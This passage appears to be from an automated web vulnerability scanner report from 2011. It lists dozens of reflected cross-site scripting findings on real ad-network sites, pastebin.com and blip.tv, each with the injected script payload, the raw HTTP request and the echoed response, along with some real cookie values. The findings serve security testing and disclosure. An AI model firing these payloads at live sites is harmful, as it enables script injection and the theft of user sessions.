GET /2/B3DM/2010DM/1548248067@x23ec8df"><script>alert(1)</script>c890c99deb6?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:49 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/;httponly
The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f5f"-alert(1)-"2e2171ccfc5 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_72812f5f"-alert(1)-"2e2171ccfc5 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:44 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2438 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/;httponly
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dominos_11Q2_247_CPC_72812f5f"-alert(1)-"2e2171ccfc5";
3.62. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/1548248067@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b5c1"-alert(1)-"8ce35333fa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728&1b5c1"-alert(1)-"8ce35333fa2=1 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:44 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2441 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/;httponly
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dominos_11Q2_247_CPC_728&1b5c1"-alert(1)-"8ce35333fa2=1";
The value of the lc request parameter is copied into the HTML document as plain text between tags. The payload 37405<a%20b%3dc>7b26340890c was submitted in the lc parameter. This input was echoed as 37405<a b=c>7b26340890c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /quant.swf?qcv=2%2E1%2E1&url=http%3A%2F%2Fstatic%2Eslidesharecdn%2Ecom%2Fswf%2Fssplayer2%2Eswf%3Fdoc%3D3%2Draylyle%2Dviglinkforumconppt%2D1%2D110218170233%2Dphpapp01%26stripped%5Ftitle%3D3%2Dray%2Dlyleviglink%2Dforumcon%2Dppt1%26userName%3DVigLink&pageURL=http%3A%2F%2Fblog%2Eviglink%2Ecom%2F&stripped%5Ftitle=3%2Dray%2Dlyleviglink%2Dforumcon%2Dppt1&doc=3%2Draylyle%2Dviglinkforumconppt%2D1%2D110218170233%2Dphpapp01&flashPlayer=WIN%2010%2C2%2C154%2C27&fpf=1%2D0%2D0&userName=VigLink&media=widget&server=http%3A%2F%2Fflash%2Equantserve%2Ecom&lc=%5F1303238625614%5F138037405<a%20b%3dc>7b26340890c&videoId=embed%5Fplayer%5Fas3&publisherId=p%2DabU44ONrAuwk2 HTTP/1.1 Host: flash.quantserve.com Proxy-Connection: keep-alive Referer: http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=3-raylyle-viglinkforumconppt-1-110218170233-phpapp01&stripped_title=3-ray-lyleviglink-forumcon-ppt1&userName=VigLink Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EEgBCQHGBpEA
FWS.Z...x.._.........D.....C....?.0....X.n.setTrace.dothetrace.allowTrace.read_so._depth.setUpLocal_lc.remote_lc.LocalConnection.LOCAL_LCNAME.rpcResult.REMOTE_LCNAME.send.local_lc.allowDomain.allowIns ...[SNIP]... ject not saved..quant Shared object flushed to disk..quant Shared object could not be flushed to disk..write_so.idToSecs.-.indexOf.slice.parseInt.Math.floor.Date.getTime..join.1-0-0._1303238625614_138037405<a b=c>7b26340890c.nothetrace.3.0.0.this.logs.initialize....initialize....)..............I............................=.. ..........O..............=................@................... . .................R....setUpLoc ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57401"><script>alert(1)</script>c45cd3456f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM57401"><script>alert(1)</script>c45cd3456f/DLX/1@x96 HTTP/1.1 Host: mig.nexac.com Proxy-Connection: keep-alive Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: na_tc=Y
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:04 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: OAX=rcHW802t6rQACp/p; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b04c"><script>alert(1)</script>d331ea74841 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLX3b04c"><script>alert(1)</script>d331ea74841/1@x96 HTTP/1.1 Host: mig.nexac.com Proxy-Connection: keep-alive Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: na_tc=Y
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:06 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: OAX=rcHW802t6rYACzMV; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 327 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 673dc"><script>alert(1)</script>a2584dc8a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLX/1@x96673dc"><script>alert(1)</script>a2584dc8a HTTP/1.1 Host: mig.nexac.com Proxy-Connection: keep-alive Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: na_tc=Y
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:08 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: OAX=rcHW802t6rgADA1J; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 316 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac1d9"><script>alert(1)</script>cc58d6ba2eb was submitted in the REST URL parameter 1. This input was echoed as ac1d9\"><script>alert(1)</script>cc58d6ba2eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /74KXCaEZac1d9"><script>alert(1)</script>cc58d6ba2eb HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin.com/74KXCaEZac1d9\"><script>alert(1)</script>cc58d6ba2eb"/> ...[SNIP]...
3.68. http://pastebin.com/74KXCaEZ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/74KXCaEZ
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ee33"><script>alert(1)</script>b559bf62345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ee33\"><script>alert(1)</script>b559bf62345 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /74KXCaEZ?6ee33"><script>alert(1)</script>b559bf62345=1 HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491c0"><script>alert(1)</script>1fb414533ea was submitted in the REST URL parameter 1. This input was echoed as 491c0\"><script>alert(1)</script>1fb414533ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /CvGXyfiJ491c0"><script>alert(1)</script>1fb414533ea HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin.com/CvGXyfiJ491c0\"><script>alert(1)</script>1fb414533ea"/> ...[SNIP]...
3.70. http://pastebin.com/CvGXyfiJ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/CvGXyfiJ
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aade4"><script>alert(1)</script>5eef0908687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aade4\"><script>alert(1)</script>5eef0908687 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /CvGXyfiJ?aade4"><script>alert(1)</script>5eef0908687=1 HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78747"><script>alert(1)</script>13324821e99 was submitted in the REST URL parameter 1. This input was echoed as 78747\"><script>alert(1)</script>13324821e99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /DBDqm6Km78747"><script>alert(1)</script>13324821e99 HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin.com/DBDqm6Km78747\"><script>alert(1)</script>13324821e99"/> ...[SNIP]...
3.72. http://pastebin.com/DBDqm6Km [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/DBDqm6Km
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7d31"><script>alert(1)</script>4d54ae0ed58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7d31\"><script>alert(1)</script>4d54ae0ed58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /DBDqm6Km?a7d31"><script>alert(1)</script>4d54ae0ed58=1 HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06bd"><script>alert(1)</script>a97465dbc53 was submitted in the REST URL parameter 1. This input was echoed as f06bd\"><script>alert(1)</script>a97465dbc53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /X8znzPWHf06bd"><script>alert(1)</script>a97465dbc53 HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin.com/X8znzPWHf06bd\"><script>alert(1)</script>a97465dbc53"/> ...[SNIP]...
3.74. http://pastebin.com/X8znzPWH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/X8znzPWH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9ebb"><script>alert(1)</script>ccd34ed679c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9ebb\"><script>alert(1)</script>ccd34ed679c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /X8znzPWH?f9ebb"><script>alert(1)</script>ccd34ed679c=1 HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f518"><script>alert(1)</script>94a013f3381 was submitted in the REST URL parameter 1. This input was echoed as 2f518\"><script>alert(1)</script>94a013f3381 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /u2f518"><script>alert(1)</script>94a013f3381/ComodoHacker HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the advId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a727c"-alert(1)-"0a1ceb9fb9d was submitted in the advId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jspix?anId=134&advId=2356384a727c"-alert(1)-"0a1ceb9fb9d&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17607"-alert(1)-"736181fd054 was submitted in the anId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jspix?anId=13417607"-alert(1)-"736181fd054&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41148"-alert(1)-"97cd6e245a9 was submitted in the campId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jspix?anId=134&advId=2356384&campId=539639741148"-alert(1)-"97cd6e245a9&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the chanId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d9e"-alert(1)-"bdc978586f7 was submitted in the chanId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132b7d9e"-alert(1)-"bdc978586f7&placementId=62214207&pubId=1036126 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.80. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.adsafeprotected.com
Path:
/jspix
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89bc6"-alert(1)-"70137643fe4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126&89bc6"-alert(1)-"70137643fe4=1 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the placementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13e10"-alert(1)-"ffa02563ec8 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=6221420713e10"-alert(1)-"ffa02563ec8&pubId=1036126 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71116"-alert(1)-"f92110ae5 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=103612671116"-alert(1)-"f92110ae5 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.83. http://sourcebarcelona2010.blip.tv/posts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sourcebarcelona2010.blip.tv
Path:
/posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65992"><script>alert(1)</script>7d42614a729 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?65992"><script>alert(1)</script>7d42614a729=1 HTTP/1.1 Host: sourcebarcelona2010.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.84. http://sourcebarcelona2010.blip.tv/posts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sourcebarcelona2010.blip.tv
Path:
/posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5f1e'%3balert(1)//c148b0a504b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5f1e';alert(1)//c148b0a504b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?a5f1e'%3balert(1)//c148b0a504b=1 HTTP/1.1 Host: sourcebarcelona2010.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.85. http://sourceboston2008.blip.tv/posts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
